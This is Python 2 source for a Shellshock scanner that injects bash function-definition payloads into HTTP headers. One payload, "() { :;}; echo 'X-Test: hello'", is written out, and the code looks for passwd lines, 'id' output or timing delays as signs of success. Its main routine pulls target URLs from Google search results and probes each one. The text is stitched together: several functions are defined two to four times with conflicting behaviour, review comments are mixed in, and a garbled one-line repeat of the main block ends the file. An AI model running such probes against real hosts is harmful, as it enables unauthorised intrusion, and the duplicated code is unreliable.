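def testBashShock1(url):
    """Probe *url* for Shellshock by sending EXPLOIT1 in an ``X-Test`` header.

    The response is reported as vulnerable when one of its header names is
    ``root``, ``nobody`` or ``daemon``.
    NOTE(review): EXPLOIT1 is defined outside this block; presumably it makes
    a vulnerable CGI handler emit passwd-style ``name:...`` lines that are
    then parsed as response headers -- confirm against its definition.

    Returns:
        True when a marker header is present, False otherwise (including
        when the request itself fails).
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    req.add_header('X-Test', EXPLOIT1)
    try:
        response = opener.open(req, timeout=15)
    except Exception:
        # Best effort: an unreachable or erroring host counts as "not detected".
        return False
    if not response:
        return False

    headers = response.info()
    if 'root' in headers or 'nobody' in headers or 'daemon' in headers:
        print
        print 'PANIC!!!'
        print '******* [shock] [URL: %s], [Header: %s] [1]' % (url, 'X-Test')
        # getheader() returns None when the match came from 'nobody' or
        # 'daemon'. Concatenating None raised TypeError, which the old
        # catch-all swallowed, so a positive result was silently dropped.
        root_line = headers.getheader('root')
        if root_line is not None:
            print 'root:' + root_line
        return True
    return False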
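def testBashShock1(url):
    """Send EXPLOIT1 in an ``X-Test`` request header and inspect the reply.

    A reply whose header names include ``root``, ``nobody`` or ``daemon`` is
    reported as a Shellshock hit.
    NOTE(review): EXPLOIT1 lives outside this block; the marker names suggest
    it leaks passwd-style lines into the response headers -- confirm.

    Returns:
        True on a hit, False when no marker is seen or the request fails.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    req.add_header('X-Test', EXPLOIT1)
    try:
        response = opener.open(req, timeout=15)
    except Exception:
        # Network and HTTP errors are deliberately non-fatal for a probe.
        return False
    if not response:
        return False

    reply_headers = response.info()
    markers = ('root', 'nobody', 'daemon')
    if not any(name in reply_headers for name in markers):
        return False

    print
    print 'PANIC!!!'
    print '******* [shock] [URL: %s], [Header: %s] [1]' % (url, 'X-Test')
    # Only print the 'root' value when that header exists. The previous
    # unconditional concatenation raised TypeError on a None value, and the
    # catch-all handler turned that into a missed detection.
    root_line = reply_headers.getheader('root')
    if root_line is not None:
        print 'root:' + root_line
    return True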
def scan(self):
    """Create a fresh opener, then run ``scanUrl`` on every URL from ``getUrls``.

    URLs are scanned in the order ``getUrls()`` yields them; duplicates are
    not filtered out. Always returns True.
    """
    opener = urllib2.build_opener()
    self._opener = opener
    webutils.setupOpener(opener)
    for target in self.getUrls():
        self.scanUrl(target)
    return True
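def testBashShock2(url):
    """Probe *url* for Shellshock through the ``Referer`` request header.

    The header carries a function-definition string whose trailing command
    echoes an ``X-Test: hello`` line. A response that contains an ``X-Test``
    header is reported as vulnerable. Only the header's presence is checked,
    not its value, so a server that sets ``X-Test`` by itself also matches.

    Returns:
        True on detection, False otherwise (including request failures).
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    exploit = "() { :;}; echo 'X-Test: hello'"
    req.add_header('Referer', exploit)
    try:
        response = opener.open(req, timeout=15)
    except Exception:
        # Best effort: a failed request is reported as "not detected".
        return False
    if not response:
        return False

    headers = response.info()
    if 'X-Test' not in headers:
        return False

    print
    print 'PANIC!!!'
    # NOTE(review): the report names 'X-Test' (the marker header), while the
    # payload was sent in 'Referer'.
    print '******* [shock] [URL: %s], [Header: %s] [*]' % (url, 'X-Test')
    # This probe does not produce a 'root' header, so getheader() normally
    # returns None. The old unconditional concatenation raised TypeError, the
    # catch-all swallowed it, and the function never returned True.
    root_line = headers.getheader('root')
    if root_line is not None:
        print 'root:' + root_line
    return True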
def testBashShockByTime(url, header):
    """Time-based Shellshock probe for one request header.

    The same request is measured twice with ``webutils.measureRequest``:
    first as a baseline, then with EXPLOIT2 added under *header*. A hit is
    reported when the second timing is at least SLEEP_TIME, larger than the
    baseline, and below TIMEBASED_TIMEOUT.

    NOTE(review): measureRequest, EXPLOIT2, SLEEP_TIME and TIMEBASED_TIMEOUT
    are defined elsewhere; the second return value is presumably elapsed
    seconds -- confirm. The test is ``t2 > t1`` rather than
    ``t2 - t1 >= SLEEP_TIME``, so a host that is already slow at baseline can
    still match.

    Returns:
        True when the timing condition holds, False otherwise.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)

    req = urllib2.Request(url)
    webutils.setupRequest(req)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')

    # Baseline timing, taken before the payload header is attached.
    response, baseline = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)

    req.add_header(header, EXPLOIT2)
    response, delayed = webutils.measureRequest(opener, req, TIMEBASED_TIMEOUT)

    hit = SLEEP_TIME <= delayed < TIMEBASED_TIMEOUT and delayed > baseline
    if not hit:
        return False

    print
    print 'PANIC!!!'
    print '******* [shock] [URL: %s] [Header: %s]' % (url, header)
    print
    return True
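def testBashShock2(url):
    """Check *url* for Shellshock using a payload in the ``Referer`` header.

    The payload's trailing command echoes ``X-Test: hello``. If the response
    carries an ``X-Test`` header the URL is reported as vulnerable. The value
    is not compared, so a server that emits ``X-Test`` on its own would be
    reported as well.

    Returns:
        True on detection, False when the marker is absent or the request
        fails.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    exploit = "() { :;}; echo 'X-Test: hello'"
    req.add_header('Referer', exploit)
    try:
        response = opener.open(req, timeout=15)
    except Exception:
        # Request errors are non-fatal for a probe; report "not detected".
        return False
    if not response:
        return False

    reply_headers = response.info()
    if 'X-Test' in reply_headers:
        print
        print 'PANIC!!!'
        # NOTE(review): 'X-Test' is the marker header; the payload itself
        # was sent in 'Referer'.
        print '******* [shock] [URL: %s], [Header: %s] [*]' % (url, 'X-Test')
        # Guard the optional 'root' header. Concatenating a None value used
        # to raise TypeError inside the catch-all, which suppressed the
        # True result.
        root_line = reply_headers.getheader('root')
        if root_line is not None:
            print 'root:' + root_line
        return True
    return False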
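def testBashShock5(url):
    """Probe *url* for Shellshock by sending EXPLOIT3 in the ``Cookie`` header.

    The response body is reported as vulnerable when it contains all three
    of ``uid=``, ``gid=`` and ``groups=``.
    NOTE(review): EXPLOIT3 is defined elsewhere; the markers look like the
    output format of ``id`` -- confirm. Any page that contains all three
    substrings for other reasons would also match.

    Returns:
        True on detection, False otherwise (including request failures).
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    req.add_header('Cookie', EXPLOIT3)
    try:
        response = opener.open(req, timeout=15)
        html = response.read()
    except Exception:
        # Best effort: connection and HTTP errors count as "not detected".
        return False

    if 'uid=' in html and 'gid=' in html and 'groups=' in html:
        print
        print 'PANIC!!!'
        print '******* [shock] [URL: %s], [Header: %s] [5]' % (url, 'Cookie')
        # The 'root' header is normally absent for this probe. The old
        # unconditional concatenation with None raised TypeError, which the
        # catch-all swallowed, so a hit returned None instead of True.
        root_line = response.info().getheader('root')
        if root_line is not None:
            print 'root:' + root_line
        return True
    return False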
def testBashShock2(url):
    """Time-based Shellshock probe that sends EXPLOIT2 in four headers at once.

    EXPLOIT2 is placed in ``X-Test``, ``User-Agent``, ``Referer`` and
    ``X-Forwarded-For``. The request is timed, and 'PANIC!!!' is printed when
    it took at least 17 and less than 30 seconds (30 is also the request
    timeout). Exceptions are printed, not raised. Returns None in all cases.

    NOTE(review): EXPLOIT2 is defined elsewhere; the 17-second threshold
    presumably matches a delay built into it -- confirm. No baseline timing
    is taken, so a slow host can match without being vulnerable.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    header_values = (
        ('Proxy-Connection', 'keep-alive'),
        ('Cache-Control', 'max-age=0'),
        ('X-Test', EXPLOIT2),
        ('User-Agent', EXPLOIT2),
        ('Referer', EXPLOIT2),
        ('X-Forwarded-For', EXPLOIT2),
    )
    for name, value in header_values:
        req.add_header(name, value)
    print '******* ' + url + ' *******'
    try:
        started = time.time()
        response = opener.open(req, timeout=30)
        elapsed = time.time() - started
        if 17 <= elapsed < 30:
            print
            print 'PANIC!!!'
            print
    except Exception as e:
        print 'Exception: ', e
def testBashShock2(url):
    """Send EXPLOIT2 in several request headers and flag a delayed response.

    The payload goes into ``X-Test``, ``User-Agent``, ``Referer`` and
    ``X-Forwarded-For``. If the timed request takes at least 17 but under 30
    seconds, 'PANIC!!!' is printed. Any exception is printed and swallowed.
    The function has no return value.

    NOTE(review): EXPLOIT2 is not visible here; the 17 s threshold is
    presumably tied to a delay in it -- confirm. Without a baseline
    measurement, a slow server alone can trigger the message.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)

    # Connection-related headers first, then the four payload carriers.
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    for carrier in ('X-Test', 'User-Agent', 'Referer', 'X-Forwarded-For'):
        req.add_header(carrier, EXPLOIT2)

    print '******* ' + url + ' *******'
    try:
        t_start = time.time()
        response = opener.open(req, timeout=30)
        took = time.time() - t_start
        delayed = took >= 17 and took < 30
        if delayed:
            print
            print 'PANIC!!!'
            print
    except Exception as e:
        print 'Exception: ', e
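def testBashShock5(url):
    """Send EXPLOIT3 in the ``Cookie`` header and scan the response body.

    A body that contains ``uid=``, ``gid=`` and ``groups=`` together is
    reported as a Shellshock hit.
    NOTE(review): EXPLOIT3 is defined outside this block; the three markers
    resemble ``id`` output -- confirm. A page that legitimately contains all
    three substrings is indistinguishable from a hit.

    Returns:
        True on a hit, False when the markers are missing or the request
        fails.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    req.add_header('Cookie', EXPLOIT3)
    try:
        response = opener.open(req, timeout=15)
        html = response.read()
    except Exception:
        # A probe failure is not fatal; report "not detected".
        return False

    markers = ('uid=', 'gid=', 'groups=')
    if not all(marker in html for marker in markers):
        return False

    print
    print 'PANIC!!!'
    print '******* [shock] [URL: %s], [Header: %s] [5]' % (url, 'Cookie')
    # Print the 'root' header only when it exists. The unguarded
    # concatenation raised TypeError on None, and the catch-all converted a
    # positive result into an implicit None return.
    root_line = response.info().getheader('root')
    if root_line is not None:
        print 'root:' + root_line
    return True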
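def testBashShock1(url):
    """Send EXPLOIT1 in four request headers and look for a ``root`` header.

    EXPLOIT1 is placed in ``X-Test``, ``User-Agent``, ``Referer`` and
    ``X-Forwarded-For``. When the response carries a non-empty ``root``
    header, 'PANIC!!!' and the header value are printed. Exceptions are
    printed, not raised. The function has no return value.

    NOTE(review): EXPLOIT1 is defined elsewhere; presumably it leaks a
    passwd-style ``root:...`` line into the response headers -- confirm.
    """
    opener = urllib2.build_opener()
    webutils.setupOpener(opener)
    req = urllib2.Request(url)
    req.add_header('Proxy-Connection', 'keep-alive')
    req.add_header('Cache-Control', 'max-age=0')
    req.add_header('X-Test', EXPLOIT1)
    req.add_header('User-Agent', EXPLOIT1)
    req.add_header('Referer', EXPLOIT1)
    req.add_header('X-Forwarded-For', EXPLOIT1)
    print '******* ' + url + ' *******'
    try:
        # Explicit timeout: without one the call falls back to the
        # process-wide socket default, so a silent host can stall the run.
        response = opener.open(req, timeout=15)
        if response:
            # Read the header once and reuse it for the test and the report.
            root_line = response.info().getheader('root')
            if root_line:
                print
                print 'PANIC!!!'
                print
                print 'root:' + root_line
    except Exception as e:
        print 'Exception: ', e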
if __name__ == '__main__':
    # Command-line entry point. Options (all take a value):
    #   -u URL  probe this single URL with testBashShock1 and testBashShock2,
    #           then exit with status 0
    #   -n N    result count passed to google.google()
    #   -b N    begin number passed to google.google()
    #   -w SEC  seconds to sleep after each probed search result
    # Without a non-empty -u value, args[0] is handed to google.google() and
    # every URL it yields is probed with testBashShock2 only.
    # NOTE(review): url, resultCount, beginNumber and waitTime are assigned
    # here only when their option is present; presumably module-level
    # defaults exist outside this block -- confirm.
    opts, args = getopt.getopt(sys.argv[1:], "n:b:w:u:")
    for flag, arg in opts:
        if flag == '-u':
            url = arg
        elif flag == '-n':
            resultCount = int(arg)
        elif flag == '-b':
            beginNumber = int(arg)
        elif flag == '-w':
            waitTime = int(arg)

    opener = urllib2.build_opener()
    webutils.setupOpener(opener)

    if len(url) > 0:
        testBashShock1(url)
        testBashShock2(url)
        sys.exit(0)

    # i ends up as the number of URLs processed; nothing below reads it.
    i = 0
    results = google.google(opener, args[0], resultCount, beginNumber)
    for i, url in enumerate(results, 1):
        testBashShock2(url)
        if waitTime > 0:
            time.sleep(waitTime)
print 'Exception: ', e opts, args = getopt.getopt(sys.argv[1:], "n:b:w:u:") for op, value in opts: if op == '-n': resultCount = int(value) elif op == '-b': beginNumber = int(value) elif op == '-u': url = value elif op == '-w': waitTime = int(value) opener = urllib2.build_opener() webutils.setupOpener(opener) if len(url) > 0: testBashShock1(url) testBashShock2(url) sys.exit(0) #print resultCount #print args[0] i = 0 #import pdb #pdb.set_trace() for url in google.google(opener, args[0], resultCount, beginNumber): i += 1 testBashShock2(url) if waitTime > 0: time.sleep(waitTime)